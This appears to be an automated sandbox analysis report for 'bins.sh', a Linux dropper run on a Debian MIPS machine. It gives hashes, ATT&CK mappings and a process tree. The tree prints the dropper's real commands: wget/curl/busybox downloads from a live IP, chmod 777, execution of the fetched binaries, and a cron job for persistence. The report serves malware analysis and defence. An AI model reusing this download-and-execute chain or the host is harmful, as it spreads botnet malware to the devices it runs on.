9eb63f75269e3be040c497aad4469eb0d59ae9c665ed79d2f0f839b9ef83f696

Analysis

max time kernel
124s
max time network
153s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
24-11-2024 01:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

fa2704f69bcefd901e2e3ca063a3a8d9
SHA1

064f497aaf9573107f8b373e608dee54df2a205d
SHA256

9eb63f75269e3be040c497aad4469eb0d59ae9c665ed79d2f0f839b9ef83f696
SHA512

ad625e97d0c8cb40831213ece86efd36c94272d47e849119364ca732b26dbb581c1369918951dbee458d5672a71d4b80926b881d8404ecd70389f897bbdafffa
SSDEEP

192:mTXvv7q7z3W7fQ7XHXzXOHvc7frq7z3xDmDaDguxxtpJnJ1JdJmvLw7Ftxm43YQA:5jL3zOHvcyBOigKLTmvLwRNRJOigg3zg

Score

9^/10

defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Contacts a large (2080) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 3 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmod

pid	Process
735	chmod
742	chmod
840	chmod

Executes dropped EXE 3 IoCs

Processes:

oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNVChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO

ioc	pid	Process
/tmp/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy	736	oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
/tmp/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV	743	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
/tmp/ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO	841	ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO

Renames itself 1 IoCs

Processes:

7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV

pid	Process
744	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

crontab

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.ao8oto	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNVcrontabcurl

description	ioc	Process
File opened for reading	/proc/930/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/949/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/970/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/1006/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/1042/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/831/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/985/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/1016/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/935/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/844/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/813/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/118/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/380/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/771/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/16/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/776/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/834/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/944/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/36/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/825/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/948/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/1043/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/18/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/766/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/1013/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/22/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/900/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/999/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/150/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/782/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/837/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/971/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/1017/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/669/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/814/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/937/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/956/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/1025/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/71/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/75/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/860/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/1044/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/696/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/752/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/817/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/2/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/816/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/875/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/955/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/781/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/819/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/898/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/972/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/998/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/1041/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/668/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/804/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/838/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/1037/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/169/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/751/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
File opened for reading	/proc/852/cmdline	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV

Writes file to tmp directory 7 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetcurlbusyboxbusyboxwgetcurlbusybox

description	ioc	Process
File opened for modification	/tmp/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV	wget
File opened for modification	/tmp/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV	curl
File opened for modification	/tmp/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV	busybox
File opened for modification	/tmp/ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO	busybox
File opened for modification	/tmp/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy	wget
File opened for modification	/tmp/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy	curl
File opened for modification	/tmp/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:703
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:706
- /usr/bin/wget
  wget http://87.120.125.191/bins/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
  2⤵
  - Writes file to tmp directory
  PID:711
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
  2⤵
  - Writes file to tmp directory
  PID:725
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
  2⤵
  - Writes file to tmp directory
  PID:732
- /bin/chmod
  chmod 777 oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
  2⤵
  - File and Directory Permissions Modification
  PID:735
- /tmp/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
  ./oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
  2⤵
  - Executes dropped EXE
  PID:736
- /bin/rm
  rm oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
  2⤵
  PID:738
- /usr/bin/wget
  wget http://87.120.125.191/bins/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
  2⤵
  - Writes file to tmp directory
  PID:739
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:740
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
  2⤵
  - Writes file to tmp directory
  PID:741
- /bin/chmod
  chmod 777 7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
  2⤵
  - File and Directory Permissions Modification
  PID:742
- /tmp/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
  ./7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:743
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:745
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:746
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:747
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      Reads runtime system information
      PID:748
- /bin/rm
  rm 7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
  2⤵
  PID:750
- /usr/bin/wget
  wget http://87.120.125.191/bins/ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO
  2⤵
  PID:753
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO
  2⤵
  PID:754
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO
  2⤵
  - Writes file to tmp directory
  PID:835
- /bin/chmod
  chmod 777 ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO
  2⤵
  - File and Directory Permissions Modification
  PID:840
- /tmp/ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO
  ./ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO
  2⤵
  - Executes dropped EXE
  PID:841
- /bin/rm
  rm ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO
  2⤵
  PID:843
- /usr/bin/wget
  wget http://87.120.125.191/bins/0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
  2⤵
  PID:844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Network Service Discovery

T1046

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV

Filesize
151KB

MD5
6c583043d91c55aa470c08c87058e917

SHA1
abf65a5b9bba69980278ad09356e53de8bb89439

SHA256
2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

SHA512
82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

Download Submit
/tmp/ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO

Filesize
98KB

MD5
5141342d0df8699fa32a6b066a0c592e

SHA1
8157673225bd5182f16215e2aa823a25ca2d4fbc

SHA256
54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

SHA512
d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

Download Submit
/tmp/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy

Filesize
99KB

MD5
9438d9bc392bcf300a5583b6df5bc8f6

SHA1
375a6ae34b516f6f3eeea8030c4084f585017efa

SHA256
68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

SHA512
1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

Download Submit
/var/spool/cron/crontabs/tmp.ao8oto

Filesize
210B

MD5
7bae465ac554b8ba8e0554e68ec6c52f

SHA1
c06dea38466e5fc097e905811831781d6f654d65

SHA256
464b0724607d348d2512d4118063f8e160b799133faa00c5e25612bd03edd15c

SHA512
3570a1c6d84f7135e011d646b525978d14bd48c2e033446b3d7673e1c8612c831a0067e7faddadd1f906ff81e2cdf0952139a34e53ab3374b853106dcaa0f4f3

Download Submit